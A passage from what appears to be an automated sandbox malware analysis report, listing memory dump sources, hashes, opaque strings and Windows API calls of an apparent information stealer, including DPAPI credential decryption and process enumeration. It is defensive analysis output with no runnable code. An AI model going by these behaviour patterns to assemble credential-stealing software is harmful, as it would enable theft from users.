                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N_
                            • API String ID: 4291131564-1897904754
                            • Opcode ID: c94c30d083869b0787ffe160a6764720acd37152f7b650fbd240b3542d1caac8
                            • Instruction ID: 0a41d5511301e94e9faf63189064f20a97ed5dd8a543ed8373d391cdab9a07ab
                            • Opcode Fuzzy Hash: c94c30d083869b0787ffe160a6764720acd37152f7b650fbd240b3542d1caac8
                            • Instruction Fuzzy Hash: 5E11A2B8240208AFEB14CF64DC95FAA77B5FB89700F208458FE159B3D0C7B6A901CB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Vh7$Xt$Xt$uU=$vv:
                            • API String ID: 0-611404519
                            • Opcode ID: 0e17bb1b145a6f5add32ef7ab7a36e48cd47de3c4dae5c37a5ea4c9a0d8e11b5
                            • Instruction ID: 1cc432f8d8195ea12e750e76d714af530b79c3debe14dddefd6a4dc53a278cad
                            • Opcode Fuzzy Hash: 0e17bb1b145a6f5add32ef7ab7a36e48cd47de3c4dae5c37a5ea4c9a0d8e11b5
                            • Instruction Fuzzy Hash: DFA2E5F3A082009FE304AE2DEC8567AFBE9EF94720F16493DE6C4C3744E67598458697
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005FC871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005FC87C
                            • lstrcat.KERNEL32(?,00610B46), ref: 005FC943
                            • lstrcat.KERNEL32(?,00610B47), ref: 005FC957
                            • lstrcat.KERNEL32(?,00610B4E), ref: 005FC978
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: f6fa11fc8983116e6aeb8bc712271b9ff779f198be97c8e44465992bf0759db8
                            • Instruction ID: 6aebee9665c41e46bc01feba8859bffbf569520885946415bfa4bdcf1fc3540f
                            • Opcode Fuzzy Hash: f6fa11fc8983116e6aeb8bc712271b9ff779f198be97c8e44465992bf0759db8
                            • Instruction Fuzzy Hash: 3F41847590420EDBDB14DF90DD89BFEBBB8BB44304F1045B8E509A6280D7B59A84CF91
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0060696C
                            • sscanf.NTDLL ref: 00606999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006069B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006069C0
                            • ExitProcess.KERNEL32 ref: 006069DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: d11e2544aa69da336d4170c394fd2a921d385331058f7dc37f54785ec72f6604
                            • Instruction ID: 3b2c67a7605d86faa56b4c1fb3591d007672c90dfe6ebfd003ba0c4a6c1a20d6
                            • Opcode Fuzzy Hash: d11e2544aa69da336d4170c394fd2a921d385331058f7dc37f54785ec72f6604
                            • Instruction Fuzzy Hash: 7E21CB75D14209ABCF48EFE4D945AEEB7B6BF48300F04852EE406E3250EB345615CB69
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 005F724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F7254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005F7281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005F72A4
                            • LocalFree.KERNEL32(?), ref: 005F72AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 154ceb66107ed55555541f2939c01015f0ba3362a51fd4613b3e8c596ac8ed21
                            • Instruction ID: 62a960f3c3c335cb81567b5cc24a1b5479a7a345226a52150ffebfefa5a17551
                            • Opcode Fuzzy Hash: 154ceb66107ed55555541f2939c01015f0ba3362a51fd4613b3e8c596ac8ed21
                            • Instruction Fuzzy Hash: FD010075A40208BBEB14DFD4DD49FAD7B78BB44700F104558FB45BA2C0D7B0AA008B65
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0060961E
                            • Process32First.KERNEL32(00610ACA,00000128), ref: 00609632
                            • Process32Next.KERNEL32(00610ACA,00000128), ref: 00609647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0060965C
                            • CloseHandle.KERNEL32(00610ACA), ref: 0060967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 9fe1f35882357387027b23c577cf1b3b20df938a5dee25d32844c5b335d479f3
                            • Instruction ID: 0ba4a3e9fcff2ce76d47a3fa26938f8d233450dc653dd5e8c55d201498130520
                            • Opcode Fuzzy Hash: 9fe1f35882357387027b23c577cf1b3b20df938a5dee25d32844c5b335d479f3
                            • Instruction Fuzzy Hash: 0B015E75A10208EBDB18DFA4CC88BEEB7FAFB48700F004598A945A7280DB359B40CF61
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,005F5184,40000001,00000000,00000000,?,005F5184), ref: 00608EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: da0f3ea3e172ade954c3bfe61ad9ee2dfc89c399074bc21f0a11151e93dd4227
                            • Instruction ID: 7a38d8cd58af81bb6fcd5134fa65f9ff635d469783ee7ce6b56663b582a95894
                            • Opcode Fuzzy Hash: da0f3ea3e172ade954c3bfe61ad9ee2dfc89c399074bc21f0a11151e93dd4227
                            • Instruction Fuzzy Hash: 3A112E70240205FFDB08CF64D885FAB37AABF89340F109858F9958B290DB75EC41DB64
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0140DA28,00000000,?,00610E10,00000000,?,00000000,00000000), ref: 00607A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0140DA28,00000000,?,00610E10,00000000,?,00000000,00000000,?), ref: 00607A7D
                            • wsprintfA.USER32 ref: 00607AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 18abc3e301ccf51fc3fdcce1d1fa1a7fded4bb2837d0828bb86e16e9b4ba1de7
                            • Instruction ID: 5848c16ecc32e0b200eab24569c5bf39840b3f02f693edd0ea623b8394bef455
                            • Opcode Fuzzy Hash: 18abc3e301ccf51fc3fdcce1d1fa1a7fded4bb2837d0828bb86e16e9b4ba1de7
                            • Instruction Fuzzy Hash: 0F118EB1E45218EBEB248B54DC49FAAB778FB44721F1047AAE90A932C0D7745A44CF51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: NoV*$rH)"$t~o
                            • API String ID: 0-3807339736
                            • Opcode ID: c4c50535b397d73ec05be903c8bf425d6334d5b5579b3b98e313b4e6f1828320
                            • Instruction ID: 8d288a5f433b8d7b2749cebfb0f87bff3a094014a6feac7e0fa4b20f10136214
                            • Opcode Fuzzy Hash: c4c50535b397d73ec05be903c8bf425d6334d5b5579b3b98e313b4e6f1828320
                            • Instruction Fuzzy Hash: D4620AF360C2009FE3046E2DEC8567ABBE9EFD4720F1A493DEAD4C7744EA3558058696
                            APIs
                            • CoCreateInstance.COMBASE(0060E118,00000000,00000001,0060E108,00000000), ref: 00603758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006037B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: f08f73b8fab077098040f27f52803288e90ad7dbf2f777dc0e4dfe5e39f6cf1a
                            • Instruction ID: d91ad17608b6e45061ecf99763ad4c44be1c53df217fc368f7b0253edb9aa330
                            • Opcode Fuzzy Hash: f08f73b8fab077098040f27f52803288e90ad7dbf2f777dc0e4dfe5e39f6cf1a
                            • Instruction Fuzzy Hash: 5041C770A40A289FDB28DF58CC95B9BB7B5BB48702F4081D9E609A72D0D7B16E85CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005F9B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 005F9BA3
                            • LocalFree.KERNEL32(?), ref: 005F9BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 218ca62f8686010c7adc33421080dc63d7f7b1dd81d0164c59f47aa4a93494e6
                            • Instruction ID: b051477b1e7d612ef6c9027d82bae724db57769ec9cf4f5641b193d9f168d58d
                            • Opcode Fuzzy Hash: 218ca62f8686010c7adc33421080dc63d7f7b1dd81d0164c59f47aa4a93494e6
                            • Instruction Fuzzy Hash: 8A11C9B8A00209EFDB04DF94D985AAEB7B5FF88301F1045A8ED15A7350D774AE10CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ASWy$b<qg
                            • API String ID: 0-1408985611
                            • Opcode ID: 46e263db9e43447fbe83603cc6b0752b48526534dc7f93c2b49061154a1ac803
                            • Instruction ID: fd1c29d37445d58bb1ad4e5038b637891c369aa39d9b2f505cbf311d58779db4
                            • Opcode Fuzzy Hash: 46e263db9e43447fbe83603cc6b0752b48526534dc7f93c2b49061154a1ac803
                            • Instruction Fuzzy Hash: 70B2F6F39082109FE304AE2DEC9567AFBE5EF94320F164A3DEAC4D3744EA3558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -E~?$A'
                            • API String ID: 0-2307484516
                            • Opcode ID: 8c3e0dd9ea8025e293f1dbcdef4a8713bd2606f95c0f749456bd28804277dbf0
                            • Instruction ID: eaab0481af8c283651b477dd1082a65533f99b42ac8844b2ae2815a7b7bf5923
                            • Opcode Fuzzy Hash: 8c3e0dd9ea8025e293f1dbcdef4a8713bd2606f95c0f749456bd28804277dbf0
                            • Instruction Fuzzy Hash: DEB208F3A082109FE304AE2DEC8567AFBE9EF94760F16463DEAC4C7744E63558058693
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /59,$zsOv$~sOv
                            • API String ID: 0-475423279
                            • Opcode ID: be8c0795defedfe2b25c7b99f69d28471793b3a8740162e262d7c732f97d122b
                            • Instruction ID: 7e721f01b54c3930c6b6b7e7bf50280e06a4ce76ed1129392f69aeadba0a7d48
                            • Opcode Fuzzy Hash: be8c0795defedfe2b25c7b99f69d28471793b3a8740162e262d7c732f97d122b
                            • Instruction Fuzzy Hash: 045118F3A082146BE3189E59ECC1B7AF3D9EB98320F1B463DEAC993740E5756C014695
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <$3:$?X{
                            • API String ID: 0-485475520
                            • Opcode ID: 86f24074e727e7e6907ad84ae29efb3b149e187e735c22621a7a077c9f45b6e2
                            • Instruction ID: bff291e0711e0bf89244239c9b3f6836deb8fd25ef6438d548debc98ef86b16f
                            • Opcode Fuzzy Hash: 86f24074e727e7e6907ad84ae29efb3b149e187e735c22621a7a077c9f45b6e2
                            • Instruction Fuzzy Hash: 423208F350C2049FE3146E2DDC8576AFBE9EF94320F1A493DEAC483744EA3558158697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: `[m
                            • API String ID: 0-3565385072
                            • Opcode ID: 2ef3cc49e287d3c9ae7e3931ce48db5185e4f036141dda3afef09982ce4a8a53
                            • Instruction ID: 5ea1b82654d9513db000b772a127c4d575f4e66ec6b9d4fa0668fcb73d5fe57c
                            • Opcode Fuzzy Hash: 2ef3cc49e287d3c9ae7e3931ce48db5185e4f036141dda3afef09982ce4a8a53
                            • Instruction Fuzzy Hash: 02B229F3A0C2049FE3046E2DEC9567ABBE9EF94720F1A463DEAC4C7344E63558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ]^u}$jas[
                            • API String ID: 0-4247793429
                            • Opcode ID: 8bdc4630ac85e85e42ccbca6b88b76b4ba5ce6f6098f5d2eb33e28dffffb5033
                            • Instruction ID: 24bef497a4ac07f5be41dc1bc78f86df02df257de2cab9296edf4079f868e577
                            • Opcode Fuzzy Hash: 8bdc4630ac85e85e42ccbca6b88b76b4ba5ce6f6098f5d2eb33e28dffffb5033
                            • Instruction Fuzzy Hash: 1D4138F3E0C2105FE3186E69DC9576BB7DAEBD4310F2B463DDAC443784E97958018686
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #.M
                            • API String ID: 0-306105806
